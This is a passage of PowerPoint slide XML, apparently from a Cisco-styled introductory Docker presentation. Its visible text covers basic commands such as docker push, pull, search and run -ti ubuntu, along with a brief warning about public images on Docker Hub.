                <a:ext cx="1325568" cy="793392"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="685800"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="282828"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>Standard </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr defTabSz="685800"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="282828"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>format</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3736884" y="1785606"/>
              <a:ext cx="2154326" cy="2096548"/>
              <a:chOff x="3746359" y="1499856"/>
              <a:chExt cx="2154326" cy="2096548"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="75" name="Title 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3746359" y="2324147"/>
                <a:ext cx="2154326" cy="1272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defTabSz="513160"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>$ </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>docker</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t> push</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr defTabSz="513160"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>$ </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>docker</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00BCEB"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t> pull</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3754367" y="1499856"/>
                <a:ext cx="1896317" cy="793392"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="685800"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="282828"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>Distribution</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr defTabSz="685800"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="282828"/>
                    </a:solidFill>
                    <a:latin typeface="CiscoSansTT ExtraLight"/>
                  </a:rPr>
                  <a:t>and versioning</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Connector 22"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5782107" y="2095459"/>
              <a:ext cx="0" cy="952541"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0183B7"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349396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Docker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437767" y="1127016"/>
            <a:ext cx="8512175" cy="4097338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t># docker -v</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="3518424"/>
            <a:ext cx="4941688" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://play-with-docker.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C04AD30-0F44-4D6D-93F5-27EE2C49D650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1821904"/>
            <a:ext cx="4766508" cy="826046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15829624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62301" y="846781"/>
            <a:ext cx="8277344" cy="362068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="169859" indent="-169859">
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> search &lt;keyword&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450578" y="222428"/>
            <a:ext cx="8345488" cy="554036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Searching for public images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462301" y="3643561"/>
            <a:ext cx="8277344" cy="1277511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="174625" indent="-174625" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1110"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" indent="-138113" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="460375" indent="-127000" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="628650" indent="-134938" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="739775" indent="-115888" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>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69859" indent="-169859" defTabSz="684196">
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Connects to ‘Docker Hub’ by default, could be a private company or team registry instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169859" indent="-169859" defTabSz="684196">
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>A word of warning on public images.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130969" indent="-130969" defTabSz="513160">
              <a:spcBef>
                <a:spcPts val="832"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B487B62D-B680-459B-9EA5-C50547BB1A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1235638"/>
            <a:ext cx="7701412" cy="2479111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4266605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62301" y="1016870"/>
            <a:ext cx="8277344" cy="1358582"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ docker search ubuntu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ubuntu public image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462301" y="2630648"/>
            <a:ext cx="8277344" cy="1358582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="174625" indent="-174625" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1110"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" indent="-138113" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="460375" indent="-127000" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="628650" indent="-134938" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="739775" indent="-115888" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>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30969" marR="0" lvl="0" indent="-130969" algn="l" defTabSz="513160" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="832"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="282828"/>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srgbClr val="282828"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>$ docker run </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>ti</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t> ubuntu </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="513160" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="832"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
